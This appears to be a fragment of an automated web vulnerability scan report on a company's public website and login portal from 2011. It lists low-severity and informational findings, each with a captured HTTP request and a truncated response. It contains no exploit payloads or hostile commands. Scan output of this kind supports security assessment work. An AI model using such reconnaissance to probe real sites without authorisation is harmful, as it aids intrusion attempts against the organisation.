HTTP/1.1 301 OK Content-Length: 182 Content-Type: text/html Location: http://www.barracuda Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:33:18 GMT Set-Cookie: locale=country_code%0Aus Date: Mon, 23 May 2011 11:41:37 GMT <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:33:20 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Mon, 23 May 2011 11:41:40 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:27 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:27 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:14:27 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6191 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... <div id="users_pane_body"> <form class="ultraform" name="login" action="/auth/login/" method="post" accept-charset="utf-8"> <div class="fieldGroup"> ...[SNIP]... <span><input tabindex="101" type="password" id="password" name="password" validation="required" placeholder="Password" value="" size="50"></span> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:33:20 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Mon, 23 May 2011 11:41:40 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.cudatel ...[SNIP]... <li><a href="http://www.cudaeye ...[SNIP]... <div style="float: right; margin: 0 16px 2px;"><a href="https://login ...[SNIP]... <li class="news"> <a href="http://www ...[SNIP]... <map name="webinar-reg"> <area shape="rect" coords="0,0,300,190" href="http://event.on24 </map> ...[SNIP]... </h1> <a style="font-weight: normal; text-decoration: none;" href="http://www <p> ...[SNIP]... <a href="customers/"><img src="http://www.barracuda <a href="customers/"><img src="http://www.barracuda <a href="customers/"><img src="http://www.barracuda ...[SNIP]... </a> | <a href="http://www | <a href="http://www | <a href="http://www | <a href="http://www | <a href="http://www.cudatel | <a href="http://www.cudaeye ...[SNIP]... <div id="live-chat-loader" style="display: none"> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:35:59 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Mon, 23 May 2011 11:44:19 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.cudatel ...[SNIP]... <li><a href="http://www.cudaeye ...[SNIP]... <div style="float: right; margin: 0 16px 2px;"><a href="https://login ...[SNIP]... <li class="news"> <a href="http://www ...[SNIP]... <map name="webinar-reg"> <area shape="rect" coords="0,0,300,190" href="http://event.on24 </map> ...[SNIP]... </h1> <a style="font-weight: normal; text-decoration: none;" href="http://www <p> ...[SNIP]... <a href="customers/"><img src="http://www.barracuda <a href="customers/"><img src="http://www.barracuda <a href="customers/"><img src="http://www.barracuda ...[SNIP]... </a> | <a href="http://www | <a href="http://www | <a href="http://www | <a href="http://www | <a href="http://www.cudatel | <a href="http://www.cudaeye ...[SNIP]... <div id="live-chat-loader" style="display: none"> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:33:20 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Mon, 23 May 2011 11:41:40 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <div id="live-chat-loader" style="display: none"> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/js/wysiwyg/wysiwyg.js |
GET /ns/js/wysiwyg/wysiwyg.js Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Wed, 20 May 2009 20:16:11 GMT Accept-Ranges: bytes ETag: "e4e49cd187d9c91:18c3" Date: Mon, 23 May 2011 11:41:47 GMT Vary: Accept-Encoding Content-Length: 34315 // // openWYSIWYG v1.0 Copyright (c) 2006 openWebWare.com // This copyright notice MUST stay intact for use. // // An open source WYSIWYG editor for use in web based applications. // For full sou ...[SNIP]... ption : Emulates insertAdjacentHTML(), insertAdjacentText() and insertAdjacentElement() three functions so they work with Netscape 6/Mozilla Notes : by Thor Larholm me@jscript.dk \* ------------------------- if(typeof HTMLElement!="undefined" && !HTMLElement.prototype HTMLElement.prototype ...[SNIP]... |